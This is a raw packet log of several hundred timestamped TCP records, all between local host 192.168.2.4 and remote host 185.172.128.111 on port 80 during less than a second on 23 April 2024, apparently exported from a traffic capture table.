Apr 23, 2024 09:27:07.491605043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.491605043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.491605043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.491715908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.491986036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492053986 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492072105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.492093086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492153883 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.492153883 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.492163897 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492207050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492217064 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.492244959 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492244959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.492311954 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.492357969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492403984 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.492433071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492470026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492491007 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.492507935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492532015 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.492544889 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492558956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.492587090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492598057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.492624044 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492624044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.492662907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492706060 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.492706060 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.492737055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492774963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.492813110 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.492813110 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.493171930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.493211031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.493257999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.493257999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494118929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494155884 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494194031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494199038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494199038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494230986 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494240046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494272947 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494286060 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494311094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494347095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494338989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494379044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494384050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494416952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494422913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494441986 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494462967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494469881 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494498968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494520903 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494535923 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494555950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494576931 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494596958 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494613886 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494626045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494656086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494661093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494693041 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494705915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494728088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494736910 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494767904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494786978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494803905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494822979 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494843006 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494859934 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494879961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494882107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494916916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494924068 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494952917 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494955063 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.494990110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.494991064 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.495029926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.495054960 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.495066881 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.495079994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.495117903 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.539638042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.539689064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.539724112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.539747000 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.539747000 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.539762020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.539779902 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.539798975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.539799929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.539836884 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.539838076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.539874077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.539875984 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.539911032 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.539913893 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.539947033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.539947033 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.539983034 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.539984941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.540019989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.542514086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.542551041 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.542583942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.542620897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595042944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595076084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595093966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595109940 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595128059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595145941 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595160961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595177889 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595215082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595232010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595316887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595316887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595316887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595316887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595316887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595329046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595345974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595362902 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595381975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595398903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595415115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595415115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595415115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595415115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595446110 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595453024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595470905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595499992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595516920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595520973 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595535040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595551014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595567942 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595585108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595587969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595587969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595587969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595602036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595622063 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595622063 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595650911 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595675945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595693111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595721960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595737934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595793962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.595930099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595930099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595931053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595931053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.595931053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.606678009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.606755018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.645710945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.645768881 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.645807028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.645844936 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.645881891 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.645919085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.645940065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.645940065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.645940065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.645941019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.645941019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.645953894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.645991087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.646018028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646018982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646028996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.646043062 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646066904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.646099091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646105051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.646117926 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646142960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.646167994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646178961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.646192074 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646217108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.646229029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646255016 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.646277905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646291971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.646306992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646331072 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.646347046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646368027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.646388054 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646404982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.646428108 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646440983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.646460056 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646477938 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.646497011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646562099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.646960974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.647000074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.647022009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.647044897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.647804976 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.647861958 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.647869110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.647907972 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.647926092 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.647944927 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.647962093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.647984028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648000956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648020983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648031950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648073912 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648092031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648153067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648154020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648199081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648273945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648341894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648382902 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648420095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648439884 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648456097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648472071 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648494959 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648509026 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648533106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648547888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648586988 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648602962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648641109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648665905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648680925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648686886 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648718119 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648736000 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648753881 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648786068 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648792028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648813963 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648833036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648845911 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648870945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648880959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648905993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648941994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648957968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648957968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.648979902 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.648983955 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.649020910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.649039984 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.649056911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.649079084 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.649094105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.649101973 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.649147987 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.697899103 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.697958946 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698111057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698111057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698165894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698209047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698234081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698262930 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698323011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698367119 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698401928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698424101 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698441982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698478937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698498011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698517084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698534012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698556900 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698595047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698606968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698606968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698631048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698643923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698669910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698689938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698710918 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698729038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698746920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698770046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698784113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698801994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698839903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698843956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698875904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698894978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698914051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698932886 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698951006 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.698964119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.698987961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.699004889 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.699028015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.699043989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.699101925 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.700545073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.700584888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.700613022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.700620890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.700635910 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.700659990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.700665951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.700697899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.700716019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.700754881 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.700737953 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.700794935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.700808048 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.700833082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.700850010 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.700870037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:07.700897932 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:07.700906038 CEST	80	49730	185.172.128.111	192.168.2.4
